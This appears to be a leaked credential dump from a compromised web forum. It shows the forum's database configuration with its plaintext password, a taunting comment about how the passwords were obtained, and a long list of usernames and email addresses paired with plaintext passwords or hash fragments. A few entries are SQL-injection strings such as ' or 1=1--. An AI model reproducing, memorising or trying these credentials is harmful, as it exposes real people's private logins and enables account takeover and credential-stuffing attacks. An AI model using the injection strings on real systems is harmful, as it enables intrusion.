$INFO['hb_sql_tbl_prefix']			=	'smf_';
$INFO['hb_sql_host']			=	'localhost';
$INFO['hb_sql_database']			=	'hak5_hak5smf';
$INFO['hb_sql_user']			=	'hak5_smf';
$INFO['hb_sql_pass']			=	'!qaZ@wsX!qaZ@wsX';
$INFO['hb_server_path'] 		=	'';
$INFO['per_members']			=	'2000';
$INFO['per_topics']			=	'2000';
$INFO['per_posts']			=	'1500';
$INFO['per_attach']			=	'100';
$INFO['hb_upload_dir']			=      
'/home2/hak5/public_html/forums/attachments';
$INFO['conv_members']			=	'1';
$INFO['conv_forums']			=	'1';
$INFO['conv_topics']			=	'1';
$INFO['conv_posts']			=	'1';
$INFO['conv_pms']			=	'1';
$INFO['conv_polls']			=	'1';
$INFO['conv_avatars']			=	'1';
$INFO['conv_attachments']			=	'1';
$INFO['conv_moderators']			=	'';
$INFO['conv_ranks']			=	'';
$INFO['conv_groups']			=	'';
$INFO['conv_group_guest']			=	'';
$INFO['conv_group_admin']			=	'';
$INFO['conv_group_member']			=	' ';
$INFO['conv_group_auth']			=	'';
$INFO['upload_dir']			=      
'/home2/hak5/public_html/forums/uploads';
$INFO['hb_sql_driver']			=	'mysql';

?>

/* 
* Passwords reversed through local OpenSSL side channel attacks.
*  
* Or not... we don't want to start another whitehat freakout
*
* 3000 lines coming up, just warning you.
*/

root@web02 [/home2/hak5/www/forums]# ./dump_passwords # hehe 
08170817 - 08170817
0lzi - 1337noob
0ptimusprime - fudukePaulita
0x3 - 1645467
13lawer - trobotrage
14267 - bee559535c218948ab47610a675fb5e9
14344 - 19d77e0fefc65d0d6ad9a0dab85fa0aa
1nfolookup - Samuel22
1sniper - go2he1l
1sniper - qwerty1
2varun8 - 2vdpb8
&#33;&#33;chemise353116 - DBIPSAt679
&#33;&#33;-kitchen-32616 - HzA9Pkl242
&#33;articles5538 - kW88UnC931
[]?[] - 33into29=fun
3656 - 140d93d222d2a0627cedd7c8afa85ebd
&#39; - &#39; or 1=1--                  <--- someone is a hacker
&#39; or &#39;1&#39;=&#39;1 - &#39; OR &#39;1&#39;=&#39;1
3aruin - redpotter23
3tek - sucit
3tek - suckit
3tek - SUCKIT
3vmike - khlozano
[3w`sparky] - bAWANA2U
[3w`sparky] - Bawana2u
4051kanobi - abigail1E
4cid6urn - ALI009ME
*5h4d0w* - j000717121426
5zerocool - tammy1213
70096007 - greenday10069007
70x&#33;c - %3m3Z3PX3H39LLzK1QS&e83CBc
786soul - aashna143
9djv4k4syiaw33grutyo - j3jf2dn7nv9mxazmtirt
a1sporty15 - proszcz1569
a - a
aamonsterpully - RqPomk31
aaobiills - Nqkhdqc361
aaon - nevermore
aardwolf - &#39; or 1=1--
aardwolf@gmail.com - npanpanpanpa
aardwolf - npanpanpanpa
aardwolf - testing123
aaron850679 - 850679
aaronmitchel - 19iepSS611
aasonstawnosawvbv - YDsf9ev644
aassnulptoolla - KUjkZX2435
aavbaseb - Nqkhdqc361
abatee - Enh3mjk
abatlyminia - 9OXdnH4847
abe se - AM=+Q#kox1Oeh@E?J*7;2Z,.8%FWiUjq
abhishekkr - abk&#036;163
abnonnatura - i9YZsCc682
abomebruro - 147852
aborscoahmabs - FE8vBx5916
absetabracced - SBKVc2p115
abubmattdag - 9fekvnD659
abwygca - QsEfTh22
acaielitehkcc - GhqlZk0757
acaisingleloverfedfsededsd - XWZrnlf676
accefiarf - 6UTeezi736
accessmore - rC896dG771
achoke - iltns0
acl - Angus
acsinglehellowworldiloveacai - azhPhRm292
addam - 123456ss
addandy - 5plugnu7
addandy - eq87JfMOIjDbeArw
addile - YPNSCDl878
addipiepecisy - 6HUtmjw361
ad_ee - qwerty
adm1nx - element5
adminlifehacker - mar2mar
adovanave - m11lKR4552
adultfriendly - bJy1qZZ539
advenspirit - ------
advenspirit - jimbean1
adwpkdc - QsEfTh22
af22man - Heratic1
affedvetdot - lAoHp8L292
afferadurge - jaEj5bP873
affisypedrisa - WkCUbi4194
afrswimmer - relay4life
agaffiy - 232323232323
agentnintynine - 4Trj4e0689
ahtyuhty - 123456
aideceasson - jlk1bP7298
aiderodar - zhlNcnk388
aideviddituro - ITOch1k174
aih85 - u9U2cAx385
airwolf - CG3RME9eZxCdYo7t
ajdanak - apes4u
ajdanak - apples4u
ajvpot - savita
aku - universe
alakar - bdw2k8
alakar - nightwolf@
alancop - glove85
albert7480 - trebla321
alcans - [14pyro93]
alelsayed - fuckyou2
alertyattinly - zhlNcnk388
alevtinka - yfrjdfkmyz
alexe - dUSC_fEr0&#036;JlR7j
alexeltherington - dUSC_fEr0&#036;JlR7j
alexf10 - alexanderwert
alex.holliz - 171308
alexhxc - 9951541
-alex- - JiA"hx9+
alexwmz - nODzylZ637
algorwari - RvASG0A115
aliceander - runsoscoe
alifshili - eHpfLcs258
alishahudge - ike02banaA
allaforny - NqQyuX3426
allanelsayed@hotmail.com - fuckyou2
allisonasson - ike02banaA
all-nude - PAR0LLee
allodiaunwils - qKYP6og935
allpyncattency - LsV9F9J866
almighty - dorwssap
aloishis89 - aloishis
alotaclass - boom9boom
altenesoino - QctpmHL896
alternetymn - vRBWlgr874
alubycync - WKrBfkA858
alvinamailew - KU1dQhm573
amadlopes - 19741975
amadlopes - 197419754
a_madman - Jens0107
amateur-sex-teens - yNlJQjg829
amd fan&#33; - 62e56f98fff9e64
amfwori - QsEfTh22
amirman - poolshokk
amugstoombgom - DNLjJ6c
an00bis - lukeleia1016
anaecesam - PDlCLIb147
anaessege - Hg6SyFU312
anbuis_1969 - scorpion1
anceceadvat - Jzj6dNX952
ancentend - rTitunR948
andrewboldman - ZVjmHgC355
android6011 - link00zelda
andyat11 - 2910
angablade - 123123123
angeldimmon - OvalZht513
angelic_torment - angie1
angelictorment - angie1
angelictorment - brathu9h
angelictorment - Clay1Ton2&#33;&#33;
angelictorment - Clay1Ton2&#33;&#33;angie1
angelictorment - tracyl
angelictorment - tracyl1
angeliosa - ih4bQPY984
angelloveyou - J4l4nHc899
anneliamoms - 5x6SIjA359
annyrebela - 0720327605
ansichild - fredbob4
ansichild - suslap
anteangel - Utbn5qj252
anteleburne - uEKUkvj129
anthonynl - hkvdzsJ988
anthrounit - leviathan
antiptemkip - PkTHShy862
antiptemtit - PkTHShy862
antirem - hobbesfox
anubis1969 - scorpion
anync - eDSemZS882
apedbeausia - YRCtjIC117
aperneles - XgJZo66514
aperture kubi - CR&#036;zy455m0f0
apollo - leg1na71
appasyhig - ZINnlXr414
applycreditcards - ZVjmHgC355
aqualuaws - cTK8Qcc791
arbitlelerbib - s8C90qD953
arch3angel - Ad3Moc3A0
ardwolf - password123
arefneriaromi - YORxK7D648
aroppimuptuct - UFkylej436
arrerfish - SSUNkUT453
arrerytauth - B4yopBd977
arrowofdarkness - hurl0ing0
art0on - forumpass
artinnabrap - pKvUo2h374
artvideobest - dXYmYsc456
ashazarbs - pOrzfrc599
ashmirrelson - windows7
ashutarigi - 666666Ff
asseenjoe - 8nEiY6g165
asseenkikla - Oh5Hgq9279
assicaneica - z5jNZQb788
assilsted - 3N9V3L5741
astencuct - Y4lP4dg917
astonmartina - 123456
astottevaphom - x9fuLI0271
astromodder - And&#036;ar789
asydayjobs - easy12aa
asytonyaa - cresco11
atglancemike - 1q9hitn358
ath - athavard
atmomoron - 26EKCsb456
atomikn - kronik4life
atpat22 - 213456789
atrocity - redrover
attaboott - WIgxtwr664
attadorry - f9dzQZs968
attespavy - 75mp1Ru921
attesteno - yBonbPB385
attiniordig - LLYx8rs519
atucom - cpndnoca
atucom - rasterops
auc94 - 5YtjdD0875
audey - thisismypass
aussieklutz - spacedinvaders
aussina07 - aussiezesydny
aussinka07 - 3d3ae039938c545
aussinka07 - aussiezesydny
aussinka07 - l1menaria
aussinka07 - limenaria
aussinka07 - password
autofix - ------
autofix - 1z2x3c4v
autofix - 1z2x3c4v5b
autofix - 6f05639f2ff3363
autofix - 94df4793cc4d525
autofix - mpi1604
autofix - mpi160490
autolautsprecherboxen - O32Bm6t819
avargum - 5464568
avasmithsson - ike02banaA
aveplabissake - AGtwEUC151
avimertx - 5675678
awqcliz - QsEfTh22
b0n3s - dnipro
b34st1y - rebellion
baaabygirl - ujyrjyu
baberape - baberape18
baby4000 - hamburg
bachebahal_1363 - 319321363m
backtrace - warning01
badpolizei - tex253803
badsector - hun3ter
baffmyiloven - barada99
bainenireld - WbETFB8694
baistckliundev - timosha123
bakkendkk - 123vbn123
ballerburgmcse - 4QselWu424
ballz187 - unborn27
ballz - unborn27
bambomz - baseball777
bandung - gQmkN01145
banglababa - banglapag0l
banglababa - banglapagol
banshee412 - L0kiG0d412
banshee412 - Site4G0d
banshee412 - V3n0m412
bardrekbupe - UzofC6E692
bareexceeds - 1yxnDJd963
barkmaybrinny - ELUJQ7E617
barley - barley
barley - barley88
barleybrother - caroline
barley - testing
barley - welcome55
barry99705 - ------
barry99705 - Sh@neh
barry99705 - Sh@Neh
bartkarmen - asdf1234
batfire - macdonald
batteryshock - bshock()
bautckldiundev - timosha123
bazastatey.ru - 118511
bbautmaydev - timosha123
bbbaistiundev - timosha
bbbkrnckiundev - timosha
bbctokiundev - timosha123
bbkjafn - QsEfTh22
bctokiundev - timosha
bdsmgirlz - bdsmgirla18
bdtgoku - bdtgohan
bdtgoku - bdtou812
beactdauctita - bNSlHNf119
beakmyn - fr4nkl1n
beakmyn - pumic3
beanceboync - 4LzNyHK467
bearfatrope - 8yT0LLN671
beatriceswan - ike02banaA
beauttundessy - AYb9z3S416
bedsfleedyfekuolpe - 0J7X786236
beefswedo - HPXFUeV618
beikerspace - JaYogqd445
beiseembals - PWLXdeC519
belgarion - sebbe23
belmakonybulgarianonlinemkjnk - gyow74g434
benjamin1254 - b3nj4m1n
benjamintimtmd - Y7zfZrP147
benoahriz - design#100
benwilowz - vJHYFxH185
bercik - solider2
berrulisso - uHjckyq917
berweitephips - SrFdwTF211
besitapetes - vuYj66l556
bestpharmacystore - storeonline123
besttubfrtt - 12345678
bfvogel - gateway1
bgaqwrl - QsEfTh22
bhhhiundev - timosha
biameteheal - 0PXcxe5359
bierhedd - Badger81
bigfatbball2 - 2107hack@rvc@
bigj51 - bigpoppa_9
bigscary1 - westside
bigswagma - OKN0W91698
bigtombb - cresco11
bikeswine - copperk96h
billhelu - Money159
billslimgates - Money159
binarybullit - There is no spoon.
binky - awdrg123
binky - imper333
bitbad - 1b2fb9bb62d4469
bittersweetca - lfif1991
bizeequabuh - APLesBe683
bkrnckmaydev - timosha
blablasometin8 - typingbecauseoffaggot2922
blablasometin8 - typingforismo1
blackriver - lawman
blackriver - lawman&#33;4096
blackriver - lawman4096
blemmcklyundev - timosha
bliderctiundev - timosha
blidermaydev - timosha
blidgekillrix - oAl3OiG136
blipsnart - 12345678
blitmebterymn - CgDt4ew872
blnotmy - QsEfTh22
bloobeviersig - vQXwImw514
blowfish - 124578
blowlelia - 0jLj0AO655
blowlelia - 123456
blue dragon - c0mp0siting
bluefigtoast - m1stycat
bluefigtoast - stun0d
bluejewelery - JRPGjsw996
bluejewel - wl0QGQv315
bluntm - 080688Cl
bmdsherman - paddyd
bmwracer0 - 092888
bnaistclkiundev - timosha
bnashamaydev - timosha
boardbreaker - viper3
boardiabign - KuvydPb782
bobbyt - BKn5fjv249
bob_s - bob_s_0
boem - hak127x
bofh139 - noodle
bofh - noodle
bohh - 0rangetr0ll
bohh - tink3r
boinq - coolu050892
boldkevin - red2000TL
bolts - P4p3rCl&#33;p&#33;
bomberman - tambot
bones - dnipro
bonzai - vtennis
boogdebuire - 3hmrTYl257
booger - liljalg
booksmart - fi3ESXk695
bourvi - 12356794
boyszko - QsEfTh22
boz8883 - garou324
boz - garou324
bpdkrniundev - timosha
bpedman - Hr1QdLNc
bprecup - sh0nuff
bpshirase - america_oh
bradothousman - rigel5115
brainhacker12 - kevlarbarsin
brainhacker12 - kleberballfreund
brandongates - Money159
bratherpayoro] - K16RtH1664
breforoappere - Fa6SKui776
brein - cannibal
brendan - paddyd
brett teh panda - 123bugme
breznika - atzQQi1938
brhalbw - QsEfTh22
brian_dnfr - 357d0fe030f77d7
brian_dnfr - #hjkyui67
brians - aa05c016b71bdc0
brians - EuuJ&#036;mQL
briansierakowski - aa05c016b71bdc0
briansierakowski - Griffen1
brianzimm - rustyzim000
brighteyedea - 10110100
brighteyedea - livingend
brightlight - OGqk74x978
brineiundev - timosha
brinklerg - brinklerg66
britneylohhans - ZVjmHgC355
broadcaststorm - williamsf1
broariliainna - 0uCI69a167
brookefox - ertert
brsonale - de3FdAq
bruceniggas - 7474584665
bruk0ut - mast3r32
brumernhen - 147852
brungilda - TurRU9K278
bshatirigi - 666666Ff
bskladcklyundev - timosha
btaliskclkiundev - timosha
btalskiundev - timosha123
btcmjpr - QsEfTh22
btf064 - quad40f
btosiundev - timosha
bugjuice - abra666
bugrignee - LLXJqXL311
bumpunfainawn - OWHnfpW265
burn420 - Fuck0ff420
burncycle - 8y19mkjae#
burnsoft@gmail.com - M*nkey00
buyjurek - p8AXsgy981
buyownswitch - voip123
buypharmacy - Kj7Gt65F
buyviagrasaleonlineop - zaaarae12
buyviagrasaleonlinewa - zaaarae12
buyviagrasaleonline - zaaarae12
buzzwang - morrigan
bvcqlcb - QsEfTh22
bvkpdclkadiundev - timosha
bvspppw - OXzjPrG748
byebyeloser - madman
bykqinm - QsEfTh22
bzpttehiundev - timosha
c3ntauri - 957blue5
cajun - ABcd45#*151
cajunslave06 - ABcd45#*15
cajunslave06 - ABcd45#*151
cajunslave06 - uzi4you
cakk - lakcak1964
camilian - cs12re5
camintmier - mint17
candaneedaces - 2oCGbNv955
cannyevex - wl0QGQv315
capheind - cat12hat
capt_chip - 022283
capt_chip - h022283
carboman - 49e74c4be47333b
carboman - 7da0d4573e5577e
carboman - 7da0d4573e5577e
carboman -  b55273236542107
carcachettels - TIgv049215
carcar1 - carcar1
careless223 - kerber0s3
carlosgatesh - Money159
casinoka - riderape18
casinoza - casinoza18
castro770 - brenda21
castro - brenda21
castro - brenda21W92for&#036;
castro - W92for&#036;
catherinecarter85 - merci123
cavaenhange - PWLXdeC519
cawduessesy - vXL1Ymy858
cawlo16 - 654645
cbaargh - ac-3dts
cc_never_die - nomoney2502
cdawerty - EeJhlDb829
cedricyh - 51adAnS863
ceedee - gotcha
celestemmcknight - T3cBLn7646
cemnakyorarry - vff5c1f922
cemwedomealep - uLih4om822
cenerrejeria - hHB9RqG679
cerex - d1gp4nact
cerex - heqyyq3h
cewcewideodia - VUYhzhN394
cha1nbull3t - Triplets
chaissito - lJSU3CN783
chakir - Adsk6k6k
chalito - 8c840ec42e4f047
chalito - wizards
chalito - Wizards1
charle123 - peacecharu
charm - ------
charm_quark - 71583073beb00eb
charm_quark - slimweed
charm_quark - slimWEED
chaser48 - 242623
cheapviagra - 786786
chearhspoes - 12axzas21a
chearmeidasca - 12axzas21a
chearmeidaxz - 12axzas21a
che - b199db232db9d6d
chelentanoxl - DuFLe3e555
chelgurl - 123456789
chenseswinelintette - znNSjdS971
chete.brown - viral737
chete - viral737
chevronx - c0es5iam
chevronx - u55nnvvb
chevronx - u5nnvvb
chillcousin21 - chill21
chris86t - rh4349
christek - programmer1
christek - shiplet1
chuckley54494 - ------
chuckley54494 - linnea54494
cigcheagmamuh - G1y8hSl616
cindyslimg - Money159
cis4smack - 000921
claicaappoist - uvfxfIW689
clanmacarms - 4581998
clanmacarms - 4581998baby
clanmacarms - 458998
clanmacarms - 94b97f92ca74e80
clanmacarms - babyx2
claplysyboalf - K1i3ICe913
clay - m23689
clayshek - m23689
clealalix - 1nSY9SF731
clearlypro - bJy1qZZ539
cleavybrell - yco7XDo382
clickerman - dipper12
cliennasirl - 5shPxyT445
clyniklyinsane - cc0cac93c2b789e
clyniklyinsane - insan3
clyniklyinsane - insane
clyniklyinsane - m2dworld
cmddotexe - letmein
cmddotexe - newland22
cninja - france
coaffabok - T0aH10i772
cobra6460 - 78210
cobra6460 - slipknot6460
cocochanels - pStyb1k636
cogskesse - ALeqBVp347
cokeman - pandora
coldheat - xy12pq
colt 45 j - 159753
colt 45 j - 951753
common067 - hpdv9812us
computerdoctor - august07
consonet - monika123linda
coolbh - brendan
coolbh - maxfli@golf911
cootormen - aaJ70aEq
copper7op - 99Accord
coreyja - Boreyja
cornboy3 - oliver1
coryspoobre - uw63ux1772
courterbag - w1ngnut&#036;
courterbag - w1ngnut4
courterbag - wingnuts
crabsbroorn - xCp7GAW872
cracknel - ajbalachim
craighb - 4kitten
craigsblackie - ------
craigsblackie - dreamcast
crazyren - renosh&#33;
crergenna - GlsLD2P242
cretintamelam - K1i3ICe913
crgwbr - craig101
croctorsmoothy - assword5
crofferesnire - GCGOklR116
cruisinue - OKGLIlu797
crurdexturb - qYAhFuX919
crydaydew - wiP4OX7727
cryptk@gmail.com - scorcher
cryptk - scorcher
csabalex - fonograf
cshmpbb - QsEfTh22
csxorrp - QsEfTh22
culile - 9cbc7033b2beb37
cuzcleo - QsEfTh22
cvv_live_forever - nomoney2502
cwig - 5235s104
cyb3rtaf - 0944128w
cyberassassin - 09082912
cyberassassin - g33king0u7
cybersnake - tatlim
cybrshrk - 8coug3
cyclallitindy - 1w3iPB2886
cykio - hak5
cyoung_mi - d4tcxr
cz01 - thor28:od
d1ck0 - mcwillis
d1rkg3ntly - 5158af0f3fcbe14
d1rkg3ntly - a&#33;DEIogg
d3sm0nd - roflzorz
dabrahams - mcsec55hak
dady203 - 0773199513
dady203 - 2009
dady203 - ff7682ca13eaeb8
dady203 - inchallah
daehlie - htableh
daehlie - Htableh1
dagis - f0rget1t&#33;
dagis - Matthew1
daikun - infolink
daisy - 99hak599
dajuiceyone615 - PikeAPSU2006
daleboy - Cartman
dalepearson - ------
dallaskorben - ------
dallaskorben - Multipass
d_almighty - dorwssap
damocles - Aph79Hak5asia
damolp - mullum2
danfon - dmsmcb
dangerduck - 12melbax
dangkywebntk - bachtuoc
danielglance - UIv5yKd524
daningling - Danno669
daniunfaicy - xCp7GAW872
danny - dmsmcb
dannyf - dmsmcb
dantex64 - fruwcioe
darcon - vermillion
darcon - vermillion0727
darcon - Vermillion0727
darius_m5 - habiba
darkangleofd34th - deller564
darkjedicoder - superfreak
darkjoker - 9058955313305
darthneo - calendar1
dasada122 - dasada
dasada - dasada
daskel - butthead
dass717lltmnrn - shamyport2180
data - e4e5f4exf4
date rape sublime - kakaxaqwe
davaelalimb - 266FPPN824
dave2299 - 8992828ab8f196e
dave2299 - fluffY_&#33;huff99#
davehardy20 - fordfocus
daverto - megatokyo
daverto - Megatokyo
davidbon2008 - yeuemtu1989
davil - C5FuR7k-giWBBIwczi5f
daydrowly - t9uIL2O628
ddaddygos - asdf1234
ddddddd - wCvHseH5ND
ddes - Panther
ddjealioffbof - QVYlGl6123
ddzoorimmumpini - QVYlGl6123
dead_already - 4be84ae79fa7d6d
deags - qwert
deathdefyer2002 - chances86
declan - skip97
deepn1ke - saracen79d
defunter - OVcPvT0255
deklooonser - dstnnds78d
deltadesu - Panther
dendkayaply - m1vtNcw962
dennis123123 - 123123
derekshills - z14789632
desheng91 - 5079326
dessscerelm - EqaoTUR522
destinydriven - hk40p220
destinydriven - ml12p321
destro - 122152
deveant - bullet
devil_82 - 170219
devildragon76 - bishop
devildragon76 - bishop76
devildragon76 - bisop76
devilking - kitty
devilking - mrkitty
devilkings - kitty
devilkings - mrkitty
dfdf - dfdfdf
dgivsfx - QsEfTh22
dht420 - oxc197ha
diablo666 - charlie666
dia - diaadiaa
digininja - yourf0t
digip - quinn&#036;123
digital dog - dovies2u
digitalmaniak3k - k00lk00l
digivore - n0t0rang
digivore - notorang
dilbg - rr1209
dimitar - Eveline
dinaengable - hIUnstH449
dineshk821012 - din821012
diplomacy - solition
dirkonsko - asdf1234
dismalmoron - bob123456
ditextil - 54665421
djahmednawaz - 894834236
djdeakyne - booker
djdiff - 8ok-gd-A
djdiff - millas
dllljxh - QsEfTh22
dlw1165 - Neon1999
dmilton - 0123456
dninja91 - NanoP0wer
dobaverve - adkj0ro569
doctormarx - Rr7nHjA199
dodipartizo - vvCI1a3922
dodo - otaku0
dogvrwt - QsEfTh22
domiingegemer - ElKTG4G771
donifana - qWert
donito - DONito28
dontpayfortwitter - VWkKix4553
doohateecenny - SL1X9h1815
doomguard - hak5logon
dotnetfreak - kkyea69
doulos447 - a&#33;DEIogg
dousypeeasero - etRSW7E138
download - uplink
doyouhas - l33t&#036;@uc3
dozern - trustno1
dozer - trustno1
dpatel304 - maruku32
dq888 - chanter
dr0p - Thereisnogodsofuckoff&#33;
draggy - m4661315h07
dragonfreight@bellsouth.net - first1
dragon_hen - dragon
dranged - kronik4life
dr.boris - Q3hR8555j6V69nMQ
dreagerig - 4GCgAnq878
dretlyattella - KuvydPb782
dr gonzo - nirvana480#
dr gonzo - randompass
dr gonzo - slayer&#33;&#33;
drivenmad - cluedart
droopy_drawers - 1234hak54321
droopy_drawers - 6e1e177e8427f1a
droopy_drawers - 99hak599
drurrypreesty - 7koBYz6936
drymnassy - CZ0l7f2733
dsagero - asdf1234
dseldentreiman - Elephant#
dsevers - diQkjfn719
dskstudio - 203644
duckerduck - loulou2@
duefillulse - aob3Wjs573
duekseeva - YLriEgU582
dummptyhummpty - a43369
dumpa - dumpa123
dunkbraibia - Nb2i9H3184
duntydync - etRSW7E138
dust997 - duma2211
dustinw - allen540*
dustinw - allen540
dustinweathers@mac.com - allen540
dustinw - gotigers08*
dustinw - gotigers08
dustydavis83 - 6db8b3bba714925
dustydavis - Dusty3737&#33;
dw5304 - mAtrIx21
dyee54 - lock0000
dyesmeddy - qkKJdUt442
dylanwinn - callie
easycheese - flotilla
easy forex - 123456789
easyforexnew - 123456789
ebolla - amber
ecommercedesignsforyou - X1cCp7m749
ecommercedesign - Tg1SCYi979
eddiem9 - h5pwd49
edgelpdop - NUz8R87811
edh - imnowan8
edhkim - imnowan8
edinsimon - vernam
effeguckpof - mink1wg114
effireechoona - T1IzJsI644
efk - aofyek
egk83 - hC3k5EQ286
elbow - jqny62
eleazer - random
eleazer - random22
eleazer - Random22
eleazer - random22&#036;
elidoplarrild - jL3SRKs354
elio173 - x9eli173
elitecodex - heather
elizle - 1D0ntc4r3
ellinkaolssen - wal1Qqn347
ellytamiflu - test123
elm - 3l3m3n
elm - 3l3m3nt
elokicttulk - bC4Cgt6351
elomblum - 147852
elorselavabag - wsfN2NN963
elrawrz - aurumestpotestas20072zephyrfe
elrawrz - p0t3s1a5
embamnastenty - Pik2pyd246
embovehib - nlbI4Zc228
emeply - 3rV6m8J987
emeryth - hak5rulz
emesencedyday - 6NBRgaF526
emimbipsfup - twc9ppU943
emiquifurriva - 4NzEIJE621
emmykinz - dr0wssaP77
empitiata - zYsVLK8747
emtech - linuxmaster
emubotaclette - ZkYTdew234
enabemymn - CVvl870224
endlessfaith - 9134628
endlessfaith - 913468
enerymnnurfzazel - i0Drg2v439
engedygab - uKZsUna445
engiseede - Yf4fDPQ675
enhadeokeld - DQORumC983
enigmaticzidon - kelson
enigmaticzidon - qbal93079
enlinadaf - UzofC6E692
enneract - fireball01
enzomatrix - Bitem3
enzomatrix - biteme
enzomatrix - titi
eperry - e9aeb75a63b7ba2
eperry - g00db33r
eperry - g00db33r&#33;
eperry - Whitetiger
ephemeral - ooh1212
ephespops - c3v0o0p635
eracite - tae4774
eraptitannork - 9AoGs5m697
erenapola - tUTAiK5252
eric.albal - lesbos
erkoasinne - dsdyjmfdf3d
erricaldom - 123456789
erronsoge - qQpsoDr436
errorn0x - R0binh00d
errorn0x - r0ughs3x
escape08 - 5ed30c6c5df63ee
escape08 - dmsmcb
esdhack - ------
esdhack - 08170817
esdhack - 6wfc353H
esdhack - seraann0817
esonargedonnn - ethdbskk3a
esqulax - stuffpleh
essendappoita - 6z4Gqn1186
essendappoita - IG4yEbQ974
essendappoita - k1NwiSW479
essendappoita - zhUY8Dd173
esxxvxc - QsEfTh22
etftw - roflcopter
ethan hunt - ajarbabon
ethan hunt - ajemvizl
ether - YeTuMC
ethical1 - hacker
ethicalhack3r - abc123
ethicalhack3r - abc123456
ethicalhack3r - tsruhwed1
etm - Marieq1
eugenegh2 - 022283
evansbee - ys7jtf
evaweberson - ike02banaA
eveldpems - S9pCATc527
everever - 31101979
evil0x86 - han...
evil0x86 - hanfei,
evil0x86 - hanfei..
evil0x86 - hanfei.
evil0x86 - hanfei
evil0x86 - kexingyu
evolutionwd - 4e01354d79e5dad
ewsdedsaf - mwVxi89322
exciqueantete - su8uBBo758
excumpmus - gg0iwrz323
exenefuevanep - OjBvhiU453
exighibise - 147852
exodusv2 - Myacc101
exoneeensueda - 3hcb9b8489
exort - 6x9z1y8
explicit - nastyboy123
exspymannn - J6qzN1H386
extimalax - QawSed37
f1tzy - 1337h4xz
f1tzy - 1337h4xzz
f1tzy - 335533f4158c4d0
fabulouskanchan - kanchansewal
factorygirlone - d7LxyRGg
fadosouroirow - AALz64i247
fafaffy - Alejandro
fafaffy - Alejandro1
fafaffy - tytyfy
fafaffy - tytyfyfy
fakap - baseball777
fakedinvert - 1337age.
fapped - i-am-c00l
fastmanvidz - hvDXnBc834
fbi_beverly.hills - ramizemina
fbkrnckmaydev - timosha
fblade1987 - united
fbsdmon - 4d6332635dd63a6
fbsdmon - meHakPass
fbsdmon - totomass
feectitemia - aiHYjXU132
feelealpsnase - 26EKCsb456
feemopeds - CvIwqUb365
felicegillbert - ike02banaA
felisia - u6HH6kp618
felitawebster - test123
fenschmeister - warwick
fernie - 040469
fernie - 4469
fernie5a - 040469
fernie5a - feernie
fernie5a - fernie
fernie - fernie5a
ferret128 - lisa254
ferrusfleerge - WkUAzW3953
fessoople - RpiyAxP441
ffgandalf - Compaq
fhirdsc - QsEfTh22
fhrewew - asdf1234
fifo_thekid - FiFoFiFo
fighterhayabusa - ister666hak5
filip007 - magnum44
firebrand - ------
firebrand - slithy-toves
fireking300 - bluefire1
firemexmen - UN8DUim124
firetime - 67656six
firstasseenontvz - OpfahSV984
fischeroptic - sRrHF2A963
fjcoiwi - QsEfTh22
flackaxia - 1ct5WiN113
flanhimiloe - XJwqVWw642
flapjack - sophie
flatfootfox - coolcow
flawless_21 - kud41b3rg3n
fleo - asasin
fleo - asasin1
fleo - asasin123
fleo - e9dfdd4ee41c0af
flermetence - Rn15aH
flexorelm - olHl7nU591
flozz - lollol
fluffyfoxbrush - b4bf9ac117
flulkbult - pc3lotj674
fmchris - programmer1
fogmaster - burninhell
followsound - schapmanict
foobab - baboof
foo - lavalamp
foorncirm - D8l02BZ472
footlyhet - QawSed82
forbrome - 657567s
forced milf sex - kakaxaqwe
fordaparts - NuVH8Xw249
forumadminstrations - 93IPOi1118
forumfanatiker - eptwsof716
fotohostergsm - fotohostergsm00
-=fox=- - joker
-=fox=- - joker917
foxle - coolcow
fox_racing97@hotmail.com  - foxracing09
-=fox=- - spitfire
fqtzcfo - QsEfTh22
frankfn - 3xStyri258
frankpintosr - frankie120699
franktank - hak5.org
frankviagrasdrr - q21716000q
frazoppoido - drvumX3967
freakazoid - wonkers1
freddamoo - SqZ7VNC155
freelancerklip - 2gY15XE625
free porn rape videos - kakaxaqwe
fropcabvqs - EHcmseC965
frost0g - tac0tac0
frost0g - tac0tac0&#33;
frosty1349 - zxc1asd2qwe3
frosty1349 - zxc1asd2wqe3
frosty - frosty2k
frosty - zxc1asd2qwe3
fruitpastles - committee330011
fsneakxp - jazz22
ft85915 - 4568
ft85915 - 693630
fuckbugmenot - bugmenot
fuckbugmenot - bugmenot=leechers
fuck gay rough forced - kakaxaqwe
fuhpourry - Nb2i9H3184
fuji0050 - 123456789aA
fullyz - calcio90
fultuththeake - QQ6BklZ637
futsosteons - FhvOfKE353
fuzeman - com12345
fwilson789 - 789456123456789
g8tk33per - q3a868at
gabrielsteel - westside
gabrielsteel - westside1234
gadget - b4seball
gambit - cooldude
gamblngisgoodbecauseicanwin - IjCH2r2243
gamerszonenz20 - p5yrx78u
gameskillz - cresco11
gandcoalavods - 4GCgAnq878
gary_coleman56 - Rouge232
gary.hodgdon@gmail.com - 022283
gary.hodgdon@gmail.com - h022283
garynu - JJASs5s321
gasilli - wafgfaaso2
gasilli - wAfgfaaso2&#33;
gatitatuttasola - 123456789
gauflaply - gIHPFic167
gaunteegani - GjNcdne889
gawlwhessedew - TO7zIQo995
gcjirhp - QsEfTh22
gcninja - france
geallerrelert - KYOecOG873
gehricba - 790316
gemeerawutemo - 8cwe6jd685
genericonline - generic777
geneticvoid - crypT0gr4m
gennfortoday - i83zh6W585
gennick[ajtajt] - tzOnfPn783
gentlemanvampir - A?bi3G1
geomdrigree - 8seJp3m252
georgiholebrook - ike02banaA
germangoogirls - mxzDJlK782
getlentepaync - S9rNlW0254
gfl20 - 2Ko17aQ855
gfrosty - frosty2k
ghksbve - QsEfTh22
ghost718 - 00ce86dd6d335d2
ghost - Gh0&#036;+&#036;
ghostlywind - pete1988
ghostshadow - poopie
gibteageffica - fdnDGW5863
giftseeker - qwerty80
giovanni - g222303
givankumar - lPyqXDU991
givver - SHUTTLEdn
glados - libum1lawl
glados - libum1libum1
glamustq - glamustq00
glislanioge - 0ui8Hxy312
gloryforixseal - ynUGXhG292
gnxcpso - QsEfTh22
godane - 0e7d3f57dbfed15
godsdead - grape89
godviagra - Kj7Gt65F
goforflyers - dHF9XZ8399
gogeoring - SZQ81si379
goldy - something
gonzor - dd170720b965974
goodcvv_vn - 123456
goodseller_eu - lovehoa
gooneekic - n0Q4tbD581
gphrzyu - QsEfTh22
gracedgirl - ike02banaA
graceison - ike02banaA
graigmaxoxy - coh2YnS861
grajemotroure - 3B2dRZw883
g-ram - amanda
grapeteen - grapeteen18
grarrytut - tUTAiK5252
greardyedjeks - 966XTv0798
grohonogazy - PEbzcGP521
